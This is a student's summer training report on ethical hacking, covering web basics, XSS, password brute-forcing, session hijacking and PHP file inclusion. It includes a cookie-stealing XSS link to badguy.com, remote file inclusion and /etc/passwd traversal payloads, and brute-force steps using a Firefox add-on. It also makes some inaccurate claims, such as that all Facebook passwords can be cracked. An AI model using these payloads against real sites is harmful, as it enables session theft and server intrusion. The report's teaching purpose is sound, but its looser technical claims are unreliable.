SUMMER TRAINING
REPORT
SUBMITTED BY:DEVPRIYO RAY
CSE-A, 3RD YEAR (VTH SEMESTER)
REG. NO-1031330059
INTRODUCTION
ANONYMOUS
As for the literal operation of Anonymous, becoming
part of it is as simple as going onto its Internet Relay
Chat forums and typing away.
The real-life people involved in Anonymous could be
behind their laptops anywhere, from an Internet caf
in Malaysia to a Michigan suburb.
Anonymous appears to have no spokesperson or
leader.
One could participate for a minute or a day in a chat
room, and then never go back again.
Anonymous is the future form of Internet-based
social activism. They laud the "hactivists" for their
actions.
WHY DO PEOPLE HACK?
To make security stronger ( Ethical Hacking )
Just for fun
Show off
Hack other systems secretly
Notify many people their thought
Steal important information
Destroy enemys computer network during the
war
WHAT IS ETHICAL HACKING?
Also Called Attack & Penetration Testing, White-hat
hacking, Red Teaming;
It is Legal
Permission is obtained from the target
Part of an overall security program
Identify vulnerabilities visible from the
Internet
Ethical hackers possesses same skills, mindset and
tools of a hacker but the attacks are done in a nondestructive manner
Hacking
Process of breaking into systems for:
Personal or Commercial Gains
Malicious Intent Causing severe damage to
Information & Assets
Conforming to accepted professional
standards of conduct
TYPES OF HACKERS
White Hat Hackers:
A White Hat who specializes in penetration testing
and in other testing methodologies to ensure the
security of an organization's information systems.
Black Hat Hackers:
A Black Hat is the villain or bad guy, especially in a
western movie in which such a character would
stereotypically wear a black hat in contrast to the
hero's white hat.
Grey Hat Hackers:
A Grey Hat, in the hacking community, refers to a
skilled hacker whose activities fall somewhere
between white and black hat hackers on a variety of
spectra
Why Cant We Defend Against Hackers?
There are many unknown unsecure holes in the
system
Hackers need to know only one loophole in the
system
Administrator needs to know all the loopholes to
defend the system
Why Do We Need Ethical Hacking?
TYPES OF ATTACKS
Various kinds of possible attacks on a computer
system are: Denial of service attack
Brute force attack
Cross site scripting (XSS)
File inclusions (or file upload), and many more.
WEB BASICS AND SECURITY
WEB APPLICATIONS:
Big trend: software as a (Web-based) service
Online banking, shopping, government, bill
payment, tax prep, customer relationship
management, etc.
Cloud computing
Applications hosted on Web servers
Written in a mixture of PHP, Java, Perl, Python, C,
ASP
Security is rarely the main concern
Poorly written scripts with inadequate input
validation
Sensitive data stored in world-readable files
Recent push from Visa and MasterCard to improve
security of data management (PCI standard)
TYPICAL WEB APPLICATION DESIGN:
A web application is designed keeping in mind the
following things:
Runs on a Web server or application server
Takes input from Web users (via Web server)
Interacts with back-end databases and third parties
Prepares and outputs results for users (via Web
server)
Dynamically generated HTML pages
Contain content from many different
sources, often including regular users
Blogs, social networks, photo-sharing
websites
BROWSER AND NETWORK:
A browser basically interacts with the network. It
sends a request to the network according to the
need of the user (using the GET method). The reply
concerning the request send is displayed on the
browser (using POST method).
BASIC EXECUTION MODEL OF A BROWSER:
Each browser window or frame:
Loads content
Renders
Processes HTML and scripts to display
the page
May involve images, subframes, etc.
Responds to events
Events
User actions: OnClick, OnMouseover
Rendering: OnLoad
Timing: setTimeout(), clearTimeout()
HTML AND SCRIPTS:
EXAMPLE
<html>
<p> The script on this page adds two numbers
<script>
var num1, num2, sum
num1 = prompt("Enter first number")
num2 = prompt("Enter second number")
sum = parseInt(num1) + parseInt(num2)
alert("Sum = " + sum)
</script>
</html>
EVENT DRIVEN SCRIPT EXECUTION:
EXAMPLE
<script type="text/javascript">
function whichButton(event) {
if (event.button==1) {
alert("You clicked the left mouse button!") }
else {
alert("You clicked the right mouse button!")
}}
</script>
<body onmousedown="whichButton(event)">
</body>
OUTPUT:
JAVASCRIPT:
Language executed by browser
Scripts are embedded in Web pages
Can run before HTML is loaded, before
page is viewed, while it is being viewed or
when leaving the page
Used to implement active web pages
AJAX, huge number of Web-based
applications
Attacker gets to execute code on users machine
Often used to exploit other vulnerabilities
The worlds most misunderstood programing
language
JAVASCRIPT IN WEBPAGES:
Embedded in HTML page as <script> element
JavaScript written directly inside <script>
element
<script> alert("Hello World!") </script>
Linked file as src attribute of the <script>
element
<script type="text/JavaScript"
src=functions.js"></script>
Event handler attribute
<a href="http://www.yahoo.com"
onmouseover="alert('hi');">
Pseudo-URL referenced by a link
<a href=JavaScript: alert(You clicked);>Click
me</a>
JAVASCRIPT SECURITY MODEL:
Script runs in a sandbox
No direct file access, restricted network
access
Same-origin policy
Can only read properties of documents and
windows from the same server, protocol,
and port
If the same server hosts unrelated sites,
scripts from one site can access document
properties on the other
User can grant privileges to signed scripts
UniversalBrowserRead/Write,
UniversalFileRead, UniversalSendMail
REMOTE SCRIPTING:
Goal: exchange data between client-side app in a
browser and server-side app (w/o reloading page)
Methods
Java applet or ActiveX control or Flash
Can make HTTP requests and interact with clientside JavaScript code, but requires LiveConnect
(not available on all browsers)
XML-RPC
Open, standards-based technology that requires
XML-RPC libraries on your server and in clientside code
Simple HTTP via a hidden IFRAME
IFRAME with a script on your web server (or
database of static HTML files) is by far the easiest
remote scripting option
REMOTE SCRIPTING EXAMPLE:
client.html: pass arguments to server.html
<script type="text/javascript">
function handleResponse() { alert('this function is called from
server.html') }
</script>
<iframe id="RSIFrame" name="RSIFrame"
style="width:0px; height:0px; border: 0px"
src="blank.html">
</iframe>
<a href="server.html" target="RSIFrame">make RPC call</a>
server.html: could be PHP app, anything
<script type="text/javascript">
window.parent.handleResponse()
</script>
CROSS SITE SCRIPTING(XSS)
WHAT IS XSS ?
An XSS vulnerability is present when an attacker can
inject scripting code into pages generated by a web
application.
Methods for injecting malicious code:
Reflected XSS (type 1)
the attack script is reflected back to the user as
part of a page from the victim site
Stored XSS (type 2)
the attacker stores the malicious code in a
resource managed by the web application, such
as a database
Others, such as DOM-based attacks
XSS EXAMPLE:
search field on victim.com:
http://victim.com/search.php ? term = apple
server-side implementation of search.php:
<HTML> <TITLE> Search Results </TITLE>
<BODY>
Results for
<?php echo $_GET[term] ?> (echo search term in response)
...
</BODY> </HTML>
Now consider the link
http://victim.com/search.php ? term =
<script> window.open(
http://badguy.com?cookie = +
document.cookie ) </script>
What if user clicks on this link?
1.
Browser goes to victim.com/search.php
2.
Victim.com returns
<HTML> Results for <script> </script>
1. Browser executes script:
Sends badguy.com cookie for victim.com
OUTPUT:
REFLECTED XSS:
STORED XSS:
CRACKING
Cracking is the procedure of knowing passwords of
certain documents, files, etc. using illegal means.
However, in case of penetration testing, cracking is
not illegal, it is done with the consent of the
required authorities.
Various methods are used to crack passwords like
brute force attack, dictionary attack, social
engineering, etc.
EXAMPLE OF BRUTE FORCE ATTACK USING
FIREFORCE:
Fireforce is an add on used in Mozilla Firefox for
cracking passwords. After installing this add on ,
the following procedure is followed:
Launching the attack:
We want the password for the user admin.
1) Fill the username section with admin
2) Right click in the Password field and select:
Fireforce> Generate Password > specify the
type of password.
3) Enter the minimum length
4) Enter the maximum length
5) Enter the text that identifies the failed
authentication
6) Enter the no. request per second
Click on save and the passwords will be generated.
Using a little imagination, all the Facebook passwords can be
cracked, but it largely depends upon the computing power of
the CPU.
However, this method cannot be applied to crack Gmail
passwords. Gmail passwords, however, can be simply cracked
using dictionary attack, which in turn requires a lot of
computing power and is way beyond the scope of a normal PC.
SESSION HIJACKING
Session hijacking, sometimes also known as cookie
hijacking is the exploitation of a valid computer
sessionsometimes also called asession keyto gain
unauthorized access to information or services in a
computer system. In particular, it is used to refer to
the theft of a magic cookie used to authenticate a user
to a remote server. It has particular relevance to web
developers, as the HTTP cookies used to maintain a
session on many web sites can be easily stolen by an
attacker using an intermediary computer or with
access to the saved cookies on the victim's computer .
A popular method is using source-routed IP packets.
This allows an attacker at point B on the network to
participate in a conversation between A and C by
encouraging the IP packets to pass
through B's machine.
If source-routing is turned off, the attacker can use
"blind" hijacking, whereby it guesses the responses of
the two machines. Thus, the attacker can send a
command, but can never see the response. However,
a common command would be to set a password
allowing access from somewhere else on the net.
METHODS OF SESSION HIJACKING:
Session fixation, where the attacker sets a user's
session id to one known to him, for example by
sending the user an email with a link that
contains a particular session id. The attacker now
only has to wait until the user logs in.
Session sidejacking, where the attacker
uses packet sniffing to read network traffic
between two parties to steal the session cookie.
Many web sites use SSLencryption
for login pages to prevent attackers from seeing
the password, but do not use encryption for the
rest of the site once authenticated. This allows
attackers that can read the network traffic to
intercept all the data that is submitted to
the server or web pages viewed by the client.
Since this data includes the session cookie, it
allows him to impersonate the victim, even if the
password itself is not compromised.
Unsecured Wi-Fi hotspots are particularly
vulnerable, as anyone sharing the network will
generally be able to read most of the web traffic
between other nodes and the access point.
Cross-site scripting, where the attacker tricks the
user's computer into running code which is
treated as trustworthy because it appears to
belong to the server, allowing the attacker to
obtain a copy of the cookie or perform other
operations.
Malware and unwanted programs can
use browser hijacking to steal a browser's cookie
files without a user's knowledge, and then
perform actions (like installing Android apps)
without the user's knowledge. An attacker with
physical access can simply attempt to steal
the session key by, for example, obtaining the
file or memory contents of the appropriate part
of either the user's computer or the server.
FILE INCLUSION
File inclusion vulnerability is a type
of vulnerability most often found on websites.
It allows an attacker to include a file, usually
through a script on the web server. The
vulnerability occurs due to the use of usersupplied input without proper validation. This
can lead to something as minimal as outputting
the contents of the file or more serious events
such as:
Code execution on the web server
Code execution on the client-side such
as JavaScript which can lead to other attacks
such as cross site scripting (XSS)
Denial of service (DoS)
Data theft/manipulation
TYPES OF INCLUSION:
1) REMOTE FILE INCLUSION
2) LOCAL FILE INCLUSION
EXAMPLE:
Consider this PHP script which includes a file
specified by request:
<?php
if ( isset( $_GET['COLOR'] ) ) {
include( $_GET['COLOR'] . '.php' );
}
?>
<form method="get">
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
The developer intended only blue.php and red.php
to be used as options. But it is possible to inject code
from other files as anyone can insert arbitrary values
for the COLOR parameter.
/vulnerable.php?COLOR=http://evil.example.co
m/webshell.txt? - injects a remotely hosted file
containing a malicious code.
/vulnerable.php?COLOR=C:\\ftp\\upload\\expl
oit - Executes code from an already uploaded file
called exploit.php (local file inclusion
vulnerability)
/vulnerable.php?COLOR=C:\\notes.txt%00 example using NULL meta character to remove
the .php suffix, allowing access to files other
than .php. (Enabling magic_quotes_gpc limits the
attack by escaping special characters, thus
disabling the use of the NUL terminator)
/vulnerable.php?COLOR=/etc/passwd%00 allows an attacker to read the contents of the
passwd file on a UNIX system directory traversal.